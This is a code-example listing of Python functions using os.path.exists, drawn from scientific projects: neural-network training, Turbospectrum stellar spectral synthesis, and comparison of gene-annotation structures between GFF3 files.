                model[i] = np.asarray(model[i]).astype(np.float32)
            np.savez(logdir+'model-'+str(epoch), model=model)

        print 'hinge loss and training error', minibatch_avg_cost / float(n_train_batches), train_error / float(n_train_batches)
        print 'time', time.clock() - tmp1
        with open(logdir+'hook.txt', 'a') as f:
            print >>f,'hinge loss and training error', minibatch_avg_cost / float(n_train_batches), train_error / float(n_train_batches)
            print >>f,'time', time.clock() - tmp1

    end_time = time.clock()
    print 'The code ran for %d epochs, with %f epochs/sec' % (
        epoch, 1. * epoch / (end_time - start_time))
    print >> sys.stderr, ('The code for file ' +
                          os.path.split(__file__)[1] +
                          ' ran for %.1fs' % ((end_time - start_time)))
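
One small note on the directory setup near the top of this example: it uses the common "if not os.path.exists(logdir): os.makedirs(logdir)" idiom. As a sketch only, on Python 3.2+ the same effect can be had without the gap between the existence check and the creation call; the path below is a placeholder, not the example's real logdir.

import os

# Placeholder path; equivalent to the exists()/makedirs() pair in the
# example above, but without the window in which another process could
# create the directory between the check and the call (Python 3.2+).
logdir = 'results/supervised/cnn/mnist/example_run/'
os.makedirs(logdir, exist_ok=True)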

Example 148

Project: apogee
Source File: turbospec.py
View license
def turbosynth(*args,**kwargs):
    """
    NAME:
       turbosynth
    PURPOSE:
       Run a Turbospectrum synthesis (direct interface to the Turbospectrum code; use 'synth' for a general routine that generates the non-continuum-normalized spectrum, convolves with the LSF and macroturbulence, and optionally continuum-normalizes the output)
    INPUT ARGUMENTS:
       lists with abundances:
          [Atomic number1,diff1]
          [Atomic number2,diff2]
          ...
          [Atomic numberM,diffM]
    SYNTHESIS KEYWORDS:
       isotopes= ('solar') use 'solar' or 'arcturus' isotope ratios; can also be a dictionary with isotope ratios (e.g., isotopes= {'6.012':'0.9375','6.013':'0.0625'})
       wmin, wmax, dw, width= (15000.000, 17000.000, 0.10000000) spectral synthesis limits and step of calculation (see MOOG)
       babsma_wmin, babsma_wmax= (wmin,wmax) allows opacity limits to be different (broader) than for the synthesis itself
       costheta= (1.) cosine of the viewing angle
    LINELIST KEYWORDS:
          air= (True) if True, perform the synthesis in air wavelengths (affects the default Hlinelist, nothing else; output is in air if air, vacuum otherwise); set to False at your own risk, as Turbospectrum expects the linelist in air wavelengths!
          Hlinelist= (None) Hydrogen linelists to use; can be set to the path of a linelist file or to the name of an APOGEE linelist; if None, then we first search for the Hlinedata.vac in the APOGEE linelist directory (if air=False) or we use the internal Turbospectrum Hlinelist (if air=True)
       linelist= (None) molecular and atomic linelists to use; can be set to the path of a linelist file or to the name of an APOGEE linelist, or lists of such files; if a single filename is given, the code will first search for files with extensions '.atoms', '.molec' or that start with 'turboatoms.' and 'turbomolec.'
    ATMOSPHERE KEYWORDS:
       modelatm= (None) model-atmosphere instance
       vmicro= (2.) microturbulence (km/s)
       modelopac= (None) 
                  (a) if set to an existing filename: assume babsma_lu has already been run and use this continuous opacity in bsyn_lu
                  (b) if set to a non-existing filename: store the continuous opacity in this file
    MISCELLANEOUS KEYWORDS:
       dr= data release
       saveTurboInput= if set to a string, the input to and output from Turbospectrum will be saved as a tar.gz file with this name; can be a filename in the current directory or a full path
    OUTPUT:
       (wavelengths,cont-norm. spectrum, spectrum (nwave))
    HISTORY:
       2015-04-13 - Written - Bovy (IAS)
    """
    # Get the spectral synthesis limits
    wmin= kwargs.pop('wmin',_WMIN_DEFAULT)
    wmax= kwargs.pop('wmax',_WMAX_DEFAULT)
    dw= kwargs.pop('dw',_DW_DEFAULT)
    babsma_wmin= kwargs.pop('babsma_wmin',wmin)
    babsma_wmax= kwargs.pop('babsma_wmax',wmax)
    if babsma_wmin > wmin or babsma_wmax < wmax:
        raise ValueError("Opacity wavelength range must encompass the synthesis range")
    if int(numpy.ceil((wmax-wmin)/dw)) > 150000:
        raise ValueError('Too many wavelengths for Turbospectrum synthesis, reduce the wavelength step dw (to, e.g., 0.016)')
    costheta= kwargs.pop('costheta',1.)
    # Linelists
    Hlinelist= kwargs.pop('Hlinelist',None)
    linelist= kwargs.pop('linelist',None)
    # Parse isotopes
    isotopes= kwargs.pop('isotopes','solar')
    if isinstance(isotopes,str) and isotopes.lower() == 'solar':
        isotopes= {}
    elif isinstance(isotopes,str) and isotopes.lower() == 'arcturus':
        isotopes= {'6.012':'0.9375',
                   '6.013':'0.0625'}
    elif not isinstance(isotopes,dict):
        raise ValueError("'isotopes=' input not understood, should be 'solar', 'arcturus', or a dictionary")
    # We will run in a subdirectory of the current directory
    tmpDir= tempfile.mkdtemp(dir=os.getcwd())
    # Get the model atmosphere
    modelatm= kwargs.pop('modelatm',None)
    if not modelatm is None:
        if isinstance(modelatm,str) and os.path.exists(modelatm):
            raise ValueError('modelatm= input is an existing filename, but you need to give an Atmosphere object instead')
        elif isinstance(modelatm,str):
            raise ValueError('modelatm= input needs to be an Atmosphere instance')
        else:
            # Check temperature
            if modelatm._teff > 7000.:
                warnings.warn('Turbospectrum does not include all necessary physics to model stars hotter than about 7000 K; proceed with caution',RuntimeWarning)
            # Write atmosphere to file
            modelfilename= os.path.join(tmpDir,'atm.mod')
            modelatm.writeto(modelfilename,turbo=True)
    modeldirname= os.path.dirname(modelfilename)
    modelbasename= os.path.basename(modelfilename)
    # Get the name of the linelists
    if Hlinelist is None:
        if kwargs.get('air',True):
            Hlinelist= 'DATA/Hlinedata' # will be symlinked
        else:
            Hlinelist= appath.linelistPath('Hlinedata.vac',
                                           dr=kwargs.get('dr',None))
    if not os.path.exists(Hlinelist) and not Hlinelist == 'DATA/Hlinedata':
        Hlinelist= appath.linelistPath(Hlinelist,
                                       dr=kwargs.get('dr',None))
    if not os.path.exists(Hlinelist) and not kwargs.get('air',True):
        print("Hlinelist in vacuum linelist not found, using Turbospectrum's, which is in air...")
        Hlinelist= 'DATA/Hlinedata' # will be symlinked
    linelistfilenames= [Hlinelist]
    if isinstance(linelist,str):
        if os.path.exists(linelist):
            linelistfilenames.append(linelist)
        else:
            # Try finding the linelist
            atomlinelistfilename= appath.linelistPath(\
                '%s.atoms' % linelist,
                dr=kwargs.get('dr',None))
            moleclinelistfilename= appath.linelistPath(\
                '%s.molec' % linelist,
                dr=kwargs.get('dr',None))
            if os.path.exists(atomlinelistfilename) \
                    and os.path.exists(moleclinelistfilename):
                linelistfilenames.append(atomlinelistfilename)
                linelistfilenames.append(moleclinelistfilename)
            else:
                atomlinelistfilename= appath.linelistPath(\
                    'turboatoms.%s' % linelist,
                    dr=kwargs.get('dr',None))
                moleclinelistfilename= appath.linelistPath(\
                    'turbomolec.%s' % linelist,
                    dr=kwargs.get('dr',None))
                if not os.path.exists(atomlinelistfilename) \
                        and '201404080919' in atomlinelistfilename \
                        and kwargs.get('air',True):
                    download.linelist(os.path.basename(atomlinelistfilename),
                                      dr=kwargs.get('dr',None))
                if not os.path.exists(moleclinelistfilename) \
                        and '201404080919' in moleclinelistfilename \
                        and kwargs.get('air',True):
                    download.linelist(os.path.basename(moleclinelistfilename),
                                      dr=kwargs.get('dr',None))
                if os.path.exists(atomlinelistfilename) \
                        and os.path.exists(moleclinelistfilename):
                    linelistfilenames.append(atomlinelistfilename)
                    linelistfilenames.append(moleclinelistfilename)
    if linelist is None or len(linelistfilenames) == 1:
        os.remove(modelfilename)
        os.rmdir(tmpDir)
        raise ValueError('linelist= must be set (see documentation) and given linelist must exist (either as absolute path or in the linelist directory)')
    # Link the Turbospectrum DATA directory
    os.symlink(os.getenv('TURBODATA'),os.path.join(tmpDir,'DATA'))
    # Cut the linelist to the desired wavelength range, if necessary,
    # Skipped because it is unnecessary, but left in case we still want to 
    # use it
    rmLinelists= False
    for ll, linelistfilename in enumerate(linelistfilenames[1:]):
        if not _CUTLINELIST: continue #SKIP
        if wmin == _WMIN_DEFAULT and wmax == _WMAX_DEFAULT: continue
        rmLinelists= True
        with open(os.path.join(tmpDir,'cutlines.awk'),'w') as awkfile:
            awkfile.write('($1>%.3f && $1<%.3f) || ( substr($1,1,1) == "' 
                          %(wmin-7.,wmax+7.) +"'"+'")\n')
        keeplines= open(os.path.join(tmpDir,'lines.tmp'),'w')
        stderr= open('/dev/null','w')
        try:
            subprocess.check_call(['awk','-f','cutlines.awk',
                                   linelistfilename],
                                  cwd=tmpDir,stdout=keeplines,stderr=stderr)
            keeplines.close()
        except subprocess.CalledProcessError:
            os.remove(os.path.join(tmpDir,'lines.tmp'))
            os.remove(os.path.join(tmpDir,'DATA'))
            raise RuntimeError("Removing unnecessary linelist entries failed ...")
        finally:
            os.remove(os.path.join(tmpDir,'cutlines.awk'))
            stderr.close()
        # Remove elements that aren't used altogether, adjust nlines
        with open(os.path.join(tmpDir,'lines.tmp'),'r') as infile:
            lines= infile.readlines()
        nl_list= [l[0] == "'" for l in lines]
        nl= numpy.array(nl_list,dtype='int')
        nl_list.append(True)
        nl_list.append(True)
        nlines= [numpy.sum(1-nl[ii:nl_list[ii+2:].index(True)+ii+2]) 
                 for ii in range(len(nl))]
        with open(os.path.join(tmpDir,os.path.basename(linelistfilename)),
                  'w') \
                as outfile:
            for ii, line in enumerate(lines):
                if ii < len(lines)-2:
                    if not lines[ii][0] == "'":
                        outfile.write(lines[ii])
                    elif not (lines[ii+2][0] == "'" and lines[ii+1][0] == "'"):
                        if lines[ii+1][0] == "'":
                            # Adjust nlines                       
                            outfile.write(lines[ii].replace(lines[ii].split()[-1]+'\n',
                                                            '%i\n' % nlines[ii]))
                        else:
                            outfile.write(lines[ii])
                else:
                    if not lines[ii][0] == "'": outfile.write(lines[ii])
        os.remove(os.path.join(tmpDir,'lines.tmp'))
        # cp the linelists to the temporary directory
        shutil.copy(linelistfilename,tmpDir)
        linelistfilenames[ll+1]= os.path.basename(linelistfilename)
    # Parse the abundances
    if len(args) == 0: #special case that there are *no* differences
        args= ([26,0.],)
    indiv_abu= {}
    for arg in args:
        indiv_abu[arg[0]]= arg[1]+solarabundances._ASPLUND05[arg[0]]\
            +modelatm._metals
        if arg[0] == 6: indiv_abu[arg[0]]+= modelatm._cm
        if arg[0] in [8,10,12,14,16,18,20,22]: indiv_abu[arg[0]]+= modelatm._am
    modelopac= kwargs.get('modelopac',None)
    if modelopac is None or \
            (isinstance(modelopac,str) and not os.path.exists(modelopac)):
        # Now write the script file for babsma_lu
        scriptfilename= os.path.join(tmpDir,'babsma.par')
        modelopacname= os.path.join(tmpDir,'mopac')
        _write_script(scriptfilename,
                      babsma_wmin,babsma_wmax,dw,
                      None,
                      modelfilename,
                      None,
                      modelopacname,
                      modelatm._metals,
                      modelatm._am,
                      indiv_abu,
                      kwargs.get('vmicro',2.),
                      None,None,None,bsyn=False)
        # Run babsma
        sys.stdout.write('\r'+"Running Turbospectrum babsma_lu ...\r")
        sys.stdout.flush()
        if kwargs.get('verbose',False):
            stdout= None
            stderr= None
        else:
            stdout= open('/dev/null', 'w')
            stderr= subprocess.STDOUT
        try:
            p= subprocess.Popen(['babsma_lu'],
                                cwd=tmpDir,
                                stdin=subprocess.PIPE,
                                stdout=stdout,
                                stderr=stderr)
            with open(os.path.join(tmpDir,'babsma.par'),'r') as parfile:
                for line in parfile:
                    p.stdin.write(line.encode('utf-8'))
            stdout, stderr= p.communicate()
        except subprocess.CalledProcessError:
            for linelistfilename in linelistfilenames:
                linelistpath= os.path.join(tmpDir,os.path.basename(linelistfilename))
                if os.path.exists(linelistpath):
                    os.remove(linelistpath)
            if os.path.exists(os.path.join(tmpDir,'DATA')):
                os.remove(os.path.join(tmpDir,'DATA'))
            raise RuntimeError("Running babsma_lu failed ...")
        finally:
            if os.path.exists(os.path.join(tmpDir,'babsma.par')) \
                    and not 'saveTurboInput' in kwargs:
                os.remove(os.path.join(tmpDir,'babsma.par'))
            sys.stdout.write('\r'+download._ERASESTR+'\r')
            sys.stdout.flush()
        if isinstance(modelopac,str):
            shutil.copy(modelopacname,modelopac)
    else:
        shutil.copy(modelopac,tmpDir)
        modelopacname= os.path.join(tmpDir,os.path.basename(modelopac))
    # Now write the script file for bsyn_lu
    scriptfilename= os.path.join(tmpDir,'bsyn.par')
    outfilename= os.path.join(tmpDir,'bsyn.out')
    _write_script(scriptfilename,
                  wmin,wmax,dw,
                  costheta,
                  modelfilename,
                  None,
                  modelopacname,
                  modelatm._metals,
                  modelatm._am,
                  indiv_abu,
                  None,
                  outfilename,
                  isotopes,
                  linelistfilenames,
                  bsyn=True)
    # Run bsyn
    sys.stdout.write('\r'+"Running Turbospectrum bsyn_lu ...\r")
    sys.stdout.flush()
    if kwargs.get('verbose',False):
        stdout= None
        stderr= None
    else:
        stdout= open('/dev/null', 'w')
        stderr= subprocess.STDOUT
    try:
        p= subprocess.Popen(['bsyn_lu'],
                            cwd=tmpDir,
                            stdin=subprocess.PIPE,
                            stdout=stdout,
                            stderr=stderr)
        with open(os.path.join(tmpDir,'bsyn.par'),'r') as parfile:
            for line in parfile:
                p.stdin.write(line.encode('utf-8'))
        stdout, stderr= p.communicate()
    except subprocess.CalledProcessError:
        raise RuntimeError("Running bsyn_lu failed ...")
    finally:
        if 'saveTurboInput' in kwargs:
            turbosavefilename= kwargs['saveTurboInput']
            if os.path.dirname(turbosavefilename) == '':
                turbosavefilename= os.path.join(os.getcwd(),turbosavefilename)
            try:
                subprocess.check_call(['tar','cvzf',turbosavefilename,
                                       os.path.basename(os.path.normpath(tmpDir))])
            except subprocess.CalledProcessError:
                raise RuntimeError("Tar-zipping the Turbospectrum input and output failed; you will have to manually delete the temporary directory ...")
            # Need to remove babsma.par here, because it is not removed above
            if os.path.exists(os.path.join(tmpDir,'babsma.par')):
                os.remove(os.path.join(tmpDir,'babsma.par'))
        if os.path.exists(os.path.join(tmpDir,'bsyn.par')):
            os.remove(os.path.join(tmpDir,'bsyn.par'))
        if os.path.exists(modelopacname):
            os.remove(modelopacname)
        if os.path.exists(modelopacname+'.mod'):
            os.remove(modelopacname+'.mod')
        if os.path.exists(os.path.join(tmpDir,'DATA')):
            os.remove(os.path.join(tmpDir,'DATA'))
        if os.path.exists(os.path.join(tmpDir,'dummy-output.dat')):
            os.remove(os.path.join(tmpDir,'dummy-output.dat'))
        if os.path.exists(modelfilename):
            os.remove(modelfilename)
        if rmLinelists:
            for linelistfilename in linelistfilenames[1:]:
                os.remove(linelistfilename)
        sys.stdout.write('\r'+download._ERASESTR+'\r')
        sys.stdout.flush()
    # Now read the output
    turboOut= numpy.loadtxt(outfilename)
    # Clean up
    os.remove(outfilename)
    os.rmdir(tmpDir)
    # Return wav, cont-norm, full spectrum
    return (turboOut[:,0],turboOut[:,1],turboOut[:,2])
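
A minimal sketch of the check-then-fetch pattern the example above builds around os.path.exists: test whether a required linelist file is present, download it only when it is missing, and raise a clear error if it still cannot be found. The fetch_linelist helper, the URL, and the path handling below are hypothetical placeholders for illustration, not part of Turbospectrum or of the project's download module.

import os
import urllib.request

def fetch_linelist(path, url):
    """Return path, downloading the file from url only if it is not present yet."""
    if not os.path.exists(path):
        # create the target directory on demand, then fetch the file
        os.makedirs(os.path.dirname(path) or '.', exist_ok=True)
        urllib.request.urlretrieve(url, path)
    if not os.path.exists(path):
        raise ValueError('linelist %s does not exist and could not be downloaded' % path)
    return path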

Example 149

Project: biocode
Source File: compare_gene_structures.py
View license
def process_files(args):
    (assemblies_1, features_1) = biocodegff.get_gff3_features(args.annotation_1)
    (assemblies_2, features_2) = biocodegff.get_gff3_features(args.annotation_2)


    a_exons = []                                    ## Holds only unique exons from the known annotation, since the same exon can appear multiple times in a GFF file.
    p_exons = []                                    ## For predicted annotation

    a_gene = []
    p_gene = []

    a_mrna = []
    p_mrna = []

    exon_pred_all = set()
    gene_true = set()
    mrna_true = set()



    chr = []

    a_cds = []                                   
    p_cds = []                                   

    a_cd = []
    p_cd= []
    chr = []

    true_pred_file = args.output_dir + '/true_predicted_genes.txt'
    true_file = open(true_pred_file,'w')
    true_file.write("Known\tPredicted\n")
    
    for asm_id in assemblies_1:                                                                                     ## Iterate through each chromosome from the known ref annotation        
        assembly_1 = assemblies_1[asm_id]
        assembly_2 = assemblies_2.get(asm_id,-1)                                                                    ## Find that chromosome in the predicted gff file
        genes_1 = assembly_1.genes()                                                                                ## All genes from known annotation
        anno_exons = set()

        for gene_1 in sorted(genes_1) :                                                                                     ## Add unique gene, mRNA, and exon features from the known annotation to get each known feature's total count
            gene_1_loc = gene_1.location_on(assembly_1)
            cord_a = cordinate(asm_id,gene_1_loc)      ## Use chromosome id+start+stop+strand as a string to determine uniqueness.
            if (cord_a not in a_gene) :
                a_gene.append(cord_a)

            ex_start = []
            ex_stop = []
            for mrna_1 in sorted(gene_1.mRNAs()) :
                mrna_1_loc = mrna_1.location_on(assembly_1)
                cord = cordinate(asm_id,mrna_1_loc)
                if (cord not in a_mrna) :
                    a_mrna.append(cord)
                    
                if (args.feature == "Exon") :
                    feat_1 = mrna_1.exons()
                    
                if (args.feature == "CDS") :
                    feat_1 = mrna_1.CDSs()
                    
                for exon_1 in sorted(feat_1) :
                    exon_1_loc = exon_1.location_on(assembly_1)
                    cord = cordinate(asm_id, exon_1_loc)
                    if (cord not in a_exons) :
                        a_exons.append(cord)
                    anno_exons.add(cord)

                    
                    ex_start.append(exon_1_loc.fmin)
                    ex_stop.append(exon_1_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            if (len(ex_start) >= 1) :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" +  str(gene_1_loc.strand)
                
            else :
                cds1 = asm_id + ":" + gene_1.id + ":" + str(gene_1_loc.fmin) + ":" + str(gene_1_loc.fmax) + ":" +  str(gene_1_loc.strand)
                
                
            if (cord_a not in a_cd) :
                a_cds.append(cds1)
                a_cd.append(cord_a)
             
                    

        if (type(assembly_2) is int) :                     ##    If the chromosome is not found in the predicted file, move to the next chromosome.
            continue
        

        genes_2 = assembly_2.genes()                      ## All genes from predicted annotation.
        chr.append(asm_id)                                ## Append all found chromosome in a list.
        pred_exons = set()

        for gene_2 in sorted(genes_2) :                           ## Add unique gene, mRNA, and exon features from the predicted annotation to get each predicted feature's total count.
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_p = cordinate(asm_id, gene_2_loc)
            if (cord_p not in p_gene) :
                p_gene.append(cord_p)

            ex_start = []
            ex_stop = []
            
            for mrna_2 in sorted(gene_2.mRNAs()) :
                mrna_2_loc = mrna_2.location_on(assembly_2)
                cord = cordinate(asm_id, mrna_2_loc)
                if (cord not in p_mrna) :
                    p_mrna.append(cord)

                if (args.feature == "Exon") :
                    feat_2 = mrna_2.exons()
                    
                if (args.feature == "CDS") :
                    feat_2 = mrna_2.CDSs()
                    
                for exon_2 in sorted(feat_2) :
                    exon_2_loc = exon_2.location_on(assembly_2)
                    cord = cordinate(asm_id ,exon_2_loc)
                    pred_exons.add(cord)
                    if (cord not in p_exons) :
                        p_exons.append(cord)
                        
                    ex_start.append(exon_2_loc.fmin)
                    ex_stop.append(exon_2_loc.fmax)
                    
            ex_start.sort()
            ex_stop.sort()
            
            if (len(ex_start) >= 1) :   
                cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                
            else :
                cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                

            if (cord_p not in p_cd) :
                p_cds.append(cds2)
                p_cd.append(cord_p)

                    
        exon_pred_all.update(pred_exons.intersection(anno_exons)) # true exons
        
        
        for gene_2 in sorted(genes_2) :                                         ## From the predicted features, determine the true ones. Iterate through each predicted gene sorted by coordinate
            gene_2_loc = gene_2.location_on(assembly_2)
            cord_g = cordinate(asm_id, gene_2_loc)
            
            if (cord_g in gene_true) :                                          ## To prevent duplication, check whether the feature already exists in the set of truly predicted genes.
                continue
            
            ex_mrna2 = set()
            			
        
            for gene_1 in sorted(genes_1) :
                ex_mrna1 = set()
                gene_1_loc = gene_1.location_on(assembly_1)
                if (gene_1_loc.strand != gene_2_loc.strand) :
                    continue
                if (gene_2.overlaps_with(gene_1)) :
                    
                    for mrna_2 in sorted(gene_2.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_2 = mrna_2.exons()
                        if (args.feature == "CDS") :
                            feat_2 = mrna_2.CDSs()
                            
                        for exon_2 in sorted(feat_2) :
                            exon_2_loc = exon_2.location_on(assembly_2)
                            cord2 = cordinate(asm_id , exon_2_loc)
                            ex_mrna2.add(cord2)
                            
                    for mrna_1 in sorted(gene_1.mRNAs()) :
                        if (args.feature == "Exon") :
                            feat_1 = mrna_1.exons()
                    
                        if (args.feature == "CDS") :
                            feat_1 = mrna_1.CDSs()
                        
                        for exon_1 in sorted(feat_1) :
                            exon_1_loc = exon_1.location_on(assembly_1)
                            cord1 = cordinate(asm_id, exon_1_loc)
                            ex_mrna1.add(cord1)
                    
                    ex_union = ex_mrna1.union(ex_mrna2)
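                    # The prediction is counted as "true" only when its exon/CDS
                    # coordinate set is identical to that of the overlapping known
                    # gene, i.e. the union is the same size as both individual sets.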
                    if (len(ex_union) ==  len(ex_mrna1) and len(ex_union) == len(ex_mrna2)) :
                        gene_true.add(cord_g)
                        true_file.write(gene_1.id+"\t"+gene_2.id+"\n")
                        break
          
    for asm_id in assemblies_2:                                                  ## Iterate through each chromosome from the predicted annotation
        if asm_id not in chr :
            assembly_2 = assemblies_2.get(asm_id,-1)                             ## Find that chromosome in the predicted gff file which is not found in known annotation
            genes_2 = assembly_2.genes()                                         ## Add gene, mRNA, and exon features from the predicted annotation to the total predicted feature set.
            
            for gene_2 in sorted(genes_2) :
                gene_2_loc = gene_2.location_on(assembly_2)
                cord_p = cordinate(asm_id ,gene_2_loc)
                if (cord_p not in p_gene) :
                    p_gene.append(cord_p)

                ex_start = []
                ex_stop = []
                
                for mrna_2 in sorted(gene_2.mRNAs()) :
                    mrna_2_loc = mrna_2.location_on(assembly_2)
                    cord = cordinate(asm_id , mrna_2_loc)
                    if (cord not in p_mrna) :
                        p_mrna.append(cord)

                    if (args.feature == "Exon") :
                        feat_2 = mrna_2.exons()
                    if (args.feature == "CDS") :
                        feat_2 = mrna_2.CDSs()
                        
                    for exon_2 in sorted(feat_2) :
                        exon_2_loc = exon_2.location_on(assembly_2)
                        cord = cordinate(asm_id ,exon_2_loc)
                        if (cord not in p_exons) :
                            p_exons.append(cord)
                            
                
                        ex_start.append(exon_2_loc.fmin)
                        ex_stop.append(exon_2_loc.fmax)

                ex_start.sort()
                ex_stop.sort()
                if (len(ex_start) >= 1) :
                    cds2 = asm_id  + ":" + gene_2.id + ":" + str(ex_start[0]) + ":" + str(ex_stop[-1]) + ":" + str(gene_2_loc.strand)
                    
                else :
                    cds2 = asm_id + ":" + gene_2.id + ":" + str(gene_2_loc.fmin) + ":" + str(gene_2_loc.fmax) + ":" +  str(gene_2_loc.strand)
                    

                if (cord_p not in p_cd) :
                    p_cds.append(cds2)
                    p_cd.append(cord_p)
                            

    

    #Calculate SN/SP for bases 

    (a_base_val, p_base_val, true_base) = base_comparison(p_exons,a_exons)

    base_sn = (true_base/a_base_val) * 100                                 
    base_sp = (true_base/p_base_val) * 100


    #Calculate SN/SP for exons 
    annotated_exon = len(a_exons)
    predicted_exon = len(p_exons)
    true_pred_exon = len(exon_pred_all)
    
    exon_sn = (true_pred_exon/annotated_exon) * 100                                 
    exon_sp = (true_pred_exon/predicted_exon) * 100

    #Calculate SN/SP for genes 

    annotated_gene = len(a_gene)
    predicted_gene = len(p_gene)
    true_pred_gene = len(gene_true)

    
    gene_sn = (true_pred_gene/annotated_gene) * 100                                 
    gene_sp = (true_pred_gene/predicted_gene) * 100
    print("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    print("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp))
    print(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp))
    print("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp))
    
    out_file = args.output_dir + '/summary.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')

    fout.write("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
    fout.write("Gene\t"+str(annotated_gene)+"\t"+str(predicted_gene)+"\t"+str(true_pred_gene)+"\t"+str(gene_sn)+"\t"+str(gene_sp)+"\n")
    fout.write(args.feature+"\t"+str(annotated_exon)+"\t"+str(predicted_exon)+"\t"+str(true_pred_exon)+"\t"+str(exon_sn)+"\t"+str(exon_sp)+"\n")
    fout.write("Base\t"+str(a_base_val)+"\t"+str(p_base_val)+"\t"+str(true_base)+"\t"+str(base_sn)+"\t"+str(base_sp)+"\n\n")


    arr_pred = compare_cds(p_cds,a_cds,"pred")
    arr_known = compare_cds(a_cds,p_cds,"known")
    arr_pred_same = compare_cds(p_cds,p_cds,"pred_same")
    
    new_gene = arr_pred[2]
    gene_merge = arr_pred[3]
    gene_found = arr_pred[0]
    gene_opp = arr_pred[1]       
    gene_missing = arr_known[2]
    gene = arr_known[0]
    gene_opp_known = arr_known[1]
    gene_split = arr_known[3]
    gene_pred_overlap_opp = arr_pred_same[1]


            
    print ("1. No. of known gene : ",len(a_cds))
    print ("2. No. of predicted gene : ",len(p_cds))
    print ("3. No. of predicted gene overlapping  0 known gene (new gene): ",new_gene)
    print ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : ",gene_merge)
    print ("5. No. of predicted gene overlaping 1 known gene : ",gene_found)
    print ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : ",gene_opp)
    print ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundaries) : ",true_pred_gene)
    print ("8. No. of predicted gene overlapping >= 1 predicted gene in opp strand : ",gene_pred_overlap_opp)
    
    print ("9. No. of known gene overlapping  0 predicted gene (gene missing): ",gene_missing)
    print ("10. No. of known gene overlapping > 1 predicted gene(gene split) : ",gene_split)
    print ("11. No. of known gene overlaping 1 predicted gene : ",gene)
    print ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : ",gene_opp_known)

    
    out_file = args.output_dir + '/final_stats.txt'
    if not (os.path.exists(args.output_dir)) :
        sys.exit("Directory does not exist.")
    fout = open(out_file,'w')
    
    fout.write ("1. No. of known gene : " + str(len(a_cds)) + "\n")
    fout.write ("2. No. of predicted gene : " + str(len(p_cds)) + "\n")
    fout.write ("3. No. of predicted gene overlapping  0 known gene (new gene): " + str(new_gene) + "\n")
    fout.write ("4. No. of predicted gene overlapping > 1 known gene (gene merge) : " + str(gene_merge) + "\n")
    fout.write ("5. No. of predicted gene overlaping 1 known gene : " + str(gene_found) + "\n")
    fout.write ("6. No. of predicted gene overlapping >= 1 known gene in opp strand : " + str(gene_opp) + "\n")
    fout.write ("7. No. of predicted gene overlapping  1 known gene (exact intron/exon boundary) : " + str(true_pred_gene) + "\n")
    fout.write ("8. No. of predicted gene overlapping >= 1  predicted gene in opp strand : " + str(gene_pred_overlap_opp) + "\n")
    fout.write ("9. No. of known gene overlapping  0 predicted gene (gene missing): " + str(gene_missing) + "\n")
    fout.write ("10. No. of known gene overlapping > 1 predicted gene (gene_split): " + str(gene_split) + "\n")
    fout.write ("11. No. of known gene overlaping 1 predicted gene : " + str(gene) + "\n")
    fout.write ("12. No. of known gene overlapping >= 1 predicted gene in opp strand : " + str(gene_opp_known) + "\n")



    true_pred_file = args.output_dir + '/true_pred.txt'
    fout_true = open(true_pred_file,'w')
    for true_gene in gene_true :
        fout_true.write(true_gene+"\n")
    


    #Clean up
    delete_file = ['exon_1.bed','exon_2.bed','exon_1_merged.bed','exon_2_merged.bed','exon_1_2_intersect.bed']
    for f in delete_file :
        cmd = "rm " + args.output_dir + "/" + f
        os.system(cmd)
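
The example above calls os.path.exists(args.output_dir) right before opening each report file and exits when the directory is missing. A minimal sketch of that guard, factored into a helper; open_report and the file name used below are illustrative and not part of biocode:

import os
import sys

def open_report(output_dir, filename):
    """Open a report file for writing, exiting early if the output directory is missing."""
    if not os.path.exists(output_dir):
        sys.exit("Directory does not exist: " + output_dir)
    return open(os.path.join(output_dir, filename), 'w')

# Example usage:
# fout = open_report(args.output_dir, 'summary.txt')
# fout.write("Feature\tKnown\tPredicted\tTrue_Predicted\tSN\tPPV\n")
# fout.close()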

Example 150

Project: mmdgm
Source File: cva_6layer_mnist_60000.py
View license
def cva_6layer_dropout_mnist_60000(seed=0, dropout_flag=1, drop_inverses_flag=0, learning_rate=3e-4, predir=None, n_batch=144,
             dataset='mnist.pkl.gz', batch_size=500, nkerns=[20, 50], n_hidden=[500, 50]):

    """
    Implementation of convolutional VA
    """    
    #cp->cd->cpd->cd->c
    nkerns=[32, 32, 64, 64, 64]
    drops=[1, 0, 1, 0, 0]
    #skerns=[5, 3, 3, 3, 3]
    #pools=[2, 1, 1, 2, 1]
    #modes=['same']*5
    n_hidden=[500, 50]
    drop_inverses=[1,]
    # 28->12->12->5->5/5*5*64->500->50->500->5*5*64/5->5->12->12->28
    
    if dataset=='mnist.pkl.gz':
        dim_input=(28, 28)
        colorImg=False

    logdir = 'results/supervised/cva/mnist/cva_6layer_mnist_60000'+str(nkerns)+str(n_hidden)+'_'+str(learning_rate)+'_'
    if predir is not None:
        logdir +='pre_'
    if dropout_flag == 1:
        logdir += ('dropout_'+str(drops)+'_')
    if drop_inverses_flag==1:
        logdir += ('inversedropout_'+str(drop_inverses)+'_')
    logdir += str(int(time.time()))+'/'

    if not os.path.exists(logdir): os.makedirs(logdir)
    print 'logdir:', logdir, 'predir', predir
